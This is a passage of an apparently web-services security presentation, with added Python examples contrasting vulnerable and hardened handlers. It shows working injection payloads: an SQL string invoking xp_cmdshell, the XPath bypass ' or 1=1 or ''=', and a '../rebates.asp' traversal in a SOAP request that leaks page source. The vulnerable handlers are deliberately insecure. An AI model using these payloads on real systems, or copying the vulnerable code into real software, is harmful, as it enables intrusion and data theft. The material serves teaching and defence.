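            message = "Server was unable to process request. --> %s" % exc  # slide 64 leak
        return ('<soap:Fault><faultcode>soap:Server</faultcode><faultstring>%s'
                '</faultstring><detail /></soap:Fault>' % escape(message))
    result = "".join("/(%d)%s($%.2f)/" % row for row in rows)
    return ('<getProductInfoResponse xmlns="%s"><getProductInfoResult>%s'
            '</getProductInfoResult></getProductInfoResponse>' % (SVC_NS, escape(result)))


if __name__ == "__main__":
    db = open_db()
    for payload in ("1", "1 or 1=1", "1'", "1;EXEC master..xp_cmdshell 'dir c:\\'"):
        print("vulnerable:", payload, "->", handle_request(db, request(payload), False))
        print("hardened:  ", payload, "->", handle_request(db, request(payload), True))
```

The integer allow-list is what closes the hole, the bound parameter is what keeps it closed when someone later widens the allow-list, and the generic fault is what stops the slide 64 fingerprinting step; all three are needed.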
  70. AV 4 - XPATH injection
     - XPATH is a new way of querying XML documents.
     - This attack works nicely on web services since they use XML extensively.
     - A developer's loophole can be leveraged with an exploit.
     - XPATH query crafting is a next-generation attack method.
  71. XPATH injection - basics
     - XPATH is a language defined to find information in an XML document.
     - As the name suggests, it uses a path to traverse the nodes of the XML document and look for specific information in it.
     - XPATH provides expressions like slash (/), double slash (//), dot (.), double dot (..), @, =, <, > etc., which help in traversing the XML document.
  72. XPATH: vulnerable code
     string fulltext = "";
     string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
     SqlXmlCommand co = new SqlXmlCommand(coString);
     co.RootTag = "Credential";
     co.CommandType = SqlXmlCommandType.Sql;
     co.CommandText = "SELECT * FROM users for xml Auto";
     XmlReader xr = co.ExecuteXmlReader();
     xr.MoveToContent();
     fulltext = xr.ReadOuterXml();
     XmlDocument doc = new XmlDocument();
     doc.LoadXml(fulltext);
     // user and pass are concatenated straight into the XPath predicate
     string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
     XmlNodeList xmln = doc.SelectNodes(credential);
     string temp;
     if (xmln.Count > 0)
     {
         //True
     }
     else
         //false
  73. Attacking the XPATH point
     //users[@username='" + user + "' and @password='" + pass + "']"
     - XPATH parsing can be leveraged by passing the following string as the username: ' or 1=1 or ''='
     - The predicate then always evaluates to true on the first node, and the user gets access as whoever the first user is: in XPath "and" binds tighter than "or", so the password check is swallowed by the last "or".
     //users[@username='' or 1=1 or ''='' and @password='any']
     - Bingo!
     DEMO
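An added example, not the presentation's own: the slide's C# reduced to Python, with a small evaluator for the predicate subset the query uses (@attr='...', =, and, or) so the precedence effect can be seen offline without an XPath library. lxml or .NET's SelectNodes give the same answer on this input; the user store is constructed, and the evaluator is a teaching aid, not an XPath engine.

```python
import re
import xml.etree.ElementTree as ET

# Constructed user store (assumption): the shape the slide's C# gets back from
# "SELECT * FROM users FOR XML AUTO" under RootTag="Credential".
USERS_XML = """<Credential>
  <users username="admin" password="s3cret"/>
  <users username="john" password="john123"/>
</Credential>"""

_TOKEN = re.compile(r"\s*(?:(and|or)\b|(@\w+)|'([^']*)'|(\d+)|(=))")
_ABSENT = object()  # an attribute the node does not have never compares equal


def tokenize(predicate):
    """Split the [...] predicate into and/or, @attr, 'string', number and = tokens."""
    tokens, pos, predicate = [], 0, predicate.strip()
    while pos < len(predicate):
        m = _TOKEN.match(predicate, pos)
        if not m:
            raise ValueError("unsupported syntax at: %r" % predicate[pos:])
        pos = m.end()
        if m.group(1) is not None:
            tokens.append(("op", m.group(1)))
        elif m.group(2) is not None:
            tokens.append(("attr", m.group(2)[1:]))
        elif m.group(3) is not None or m.group(4) is not None:
            tokens.append(("val", m.group(3) if m.group(3) is not None else m.group(4)))
        else:
            tokens.append(("eq", "="))
    return tokens


def evaluate(tokens, attrib):
    """Evaluate the predicate against one node's attributes with XPath 1.0
    precedence: '=' binds tighter than 'and', which binds tighter than 'or'."""
    pos = 0

    def atom():
        nonlocal pos
        kind, value = tokens[pos]
        pos += 1
        if kind == "attr":
            return attrib.get(value, _ABSENT)
        if kind == "val":
            return value
        raise ValueError("unexpected token %r" % value)

    def equality():
        nonlocal pos
        left = atom()
        if pos < len(tokens) and tokens[pos] == ("eq", "="):
            pos += 1
            right = atom()
            return left is not _ABSENT and right is not _ABSENT and left == right
        return left is not _ABSENT and left != ""  # bare value: true unless empty

    def conjunction():
        nonlocal pos
        result = equality()
        while pos < len(tokens) and tokens[pos] == ("op", "and"):
            pos += 1
            result = equality() and result
        return result

    def disjunction():
        nonlocal pos
        result = conjunction()
        while pos < len(tokens) and tokens[pos] == ("op", "or"):
            pos += 1
            result = conjunction() or result
        return result

    result = disjunction()
    if pos != len(tokens):
        raise ValueError("trailing tokens")
    return result


def login_vulnerable(user, password):
    # Same string concatenation as the slide's C#: the input becomes part of the query.
    predicate = "@username='" + user + "' and @password='" + password + "'"
    tokens = tokenize(predicate)
    root = ET.fromstring(USERS_XML)
    return [u.get("username") for u in root.iter("users") if evaluate(tokens, u.attrib)]


def login_hardened(user, password):
    # Compare values in code; the untrusted strings never reach the query language.
    root = ET.fromstring(USERS_XML)
    return [u.get("username") for u in root.iter("users")
            if u.get("username") == user and u.get("password") == password]


if __name__ == "__main__":
    print(login_vulnerable("john", "john123"))            # ['john']
    print(login_vulnerable("' or 1=1 or ''='", "any"))    # every user matches
    print(login_hardened("' or 1=1 or ''='", "any"))      # []
```

If the query must stay an XPath expression (for instance because the store is large), the equivalent of a bound parameter is an XPath variable ($user) supplied through the engine's variable resolver; quoting the value by hand is the XPath analogue of escaping for SQL and is as easy to get wrong.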
  74. AV 5 - LDAP injection
     - LDAP authentication in place
     - Possible to manipulate LDAP queries
     - May lead to enumeration or manipulation
     - Interesting attack vector
     - Fault code leaks the LDAP interface
     DEMO
  75. AV 6 - File system access
     - Identifying file system points
     - Directory traversal & access
     - Leads to file access and source code exposure
     - Lethal if found!
     DEMO
  76. SOAP request: forcing a fault code (source of enumeration). The method called is getRebatesInfo; <fileinfo> is the input to the method.
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getRebatesInfo xmlns="http://tempuri.org/">
           <fileinfo>abx.xyz</fileinfo>
         </getRebatesInfo>
       </soap:Body>
     </soap:Envelope>
     DEMO
  77. SOAP response: the fault code enumerates the internal path
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <soap:Fault>
           <faultcode>soap:Server</faultcode>
           <faultstring>Server was unable to process request. --&gt; Could not find file &quot;c:\inetpub\wwwroot\rebates\abx.xyz&quot;.</faultstring>
           <detail />
         </soap:Fault>
       </soap:Body>
     </soap:Envelope>
  78. SOAP request: forcing a file. The method called is getRebatesInfo; <fileinfo> is the input to the method.
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getRebatesInfo xmlns="http://tempuri.org/">
           <fileinfo>../rebates.asp</fileinfo>
         </getRebatesInfo>
       </soap:Body>
     </soap:Envelope>
  79. SOAP response: file access to the system via parameter tampering; the response carries the ASP source
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getRebatesInfoResponse xmlns="http://tempuri.org/">
           <getRebatesInfoResult>&lt;% ' file: rebates.asp ' date: 20-AUG-03 ' desc: rebates listing ' author: nd ' client: dvds4less 'check if we have been called with a filename or without loc = request.querystring("loc") lenloc = len(loc) if lenloc &gt; 0 then ' we have been called with a filename ' so print the rebate coupon%&gt;&lt;img ……………………. </getRebatesInfoResult>
         </getRebatesInfoResponse>
       </soap:Body>
     </soap:Envelope>
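An added example (mine, not from the presentation) covering both the fault-code leak of slides 59-60 and 76-77 and the traversal of slides 78-79: the vulnerable handler joins <fileinfo> onto the rebates directory and copies the exception text into the fault string; the hardened handler allow-lists the file name, confirms the resolved path stays inside the directory, and returns a generic fault. The directory layout is constructed in a temporary directory, and the ".txt coupon file" naming rule is an assumption about what the service should legitimately serve.

```python
import os
import re
import tempfile
from xml.sax.saxutils import escape

SVC_NS = "http://tempuri.org/"


def make_fixture():
    """Constructed layout: <base>/rebates/ holds coupon files and rebates.asp
    (the page source the slide retrieves) sits one directory above it."""
    base = tempfile.mkdtemp()
    rebates = os.path.join(base, "rebates")
    os.mkdir(rebates)
    with open(os.path.join(rebates, "coupon1.txt"), "w") as fh:
        fh.write("10% off Finding Nemo")
    with open(os.path.join(base, "rebates.asp"), "w") as fh:
        fh.write("<% ' file: rebates.asp\nloc = request.querystring(\"loc\") %>")
    return rebates


def fault(message):
    return ('<soap:Fault><faultcode>soap:Server</faultcode><faultstring>%s'
            '</faultstring><detail /></soap:Fault>' % escape(message))


def result(text):
    return ('<getRebatesInfoResponse xmlns="%s"><getRebatesInfoResult>%s'
            '</getRebatesInfoResult></getRebatesInfoResponse>' % (SVC_NS, escape(text)))


def get_rebates_info_vulnerable(rebates_dir, fileinfo):
    # Mirrors the demo: the parameter is joined onto the directory unchecked, and
    # the exception text (full path included) is copied into the fault string.
    path = os.path.join(rebates_dir, fileinfo)
    try:
        with open(path) as fh:
            return result(fh.read())
    except OSError as exc:
        return fault("Server was unable to process request. --> %s" % exc)


def get_rebates_info_hardened(rebates_dir, fileinfo):
    # 1. Allow-list the name: one plain coupon file name, no separators, no "..".
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.txt", fileinfo or ""):
        return fault("Invalid rebate reference.")
    # 2. Resolve and confirm the target stays inside the rebates directory
    #    (catches symlinks, which the name check alone cannot see).
    base = os.path.realpath(rebates_dir)
    path = os.path.realpath(os.path.join(base, fileinfo))
    if os.path.commonpath([base, path]) != base:
        return fault("Invalid rebate reference.")
    try:
        with open(path) as fh:
            return result(fh.read())
    except OSError:
        # 3. Generic fault: no path, no exception text.
        return fault("Rebate not found.")


if __name__ == "__main__":
    rebates = make_fixture()
    for name in ("coupon1.txt", "abx.xyz", "../rebates.asp"):
        print("vulnerable:", name, "->", get_rebates_info_vulnerable(rebates, name))
        print("hardened:  ", name, "->", get_rebates_info_hardened(rebates, name))
```

The two faults the hardened version returns are deliberately different ("invalid reference" versus "not found"): that distinction is useful to the legitimate client and tells an attacker nothing about the file system, whereas the vulnerable fault hands over the web root path before any traversal has been attempted.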
  80. AV 7 - SOAP brute forcing
     - The SOAP envelope takes user & password accounts.
     - It is possible to brute force the SOAP envelope and look for specific responses.
     - This is a possible attack which can get into the system.
     - Analyzing the SOAP response is key for this set of attacks.
     DEMO
  81. AV 8 - Parameter overflow
     - Adding large buffers to XML nodes
     - Depending on code controls, the handling may fail
     - Breaking the application
     - May compromise as well
     - Traditional buffer overflow type attacks
     DEMO
  82. AV 9 - Operating system access
     - Point to the OS
     - Remote command execution is possible
     - Either by "|" or ";"
     - The attack is very much possible
     - Leads to admin/root on the box...
     DEMO
  83. AV 10 - Session hijacking
     - Web services can maintain sessions: [WebMethod(EnableSession=true)]
     - Possible to reverse engineer the session
     - Cookie tampering is a reality...
     - Can be compared to traditional web application sessions.
     DEMO
  84. Other attacks
     - External referencing (XML schema)
     - XSS attack
     - In-transit attacks: replay and spoofing
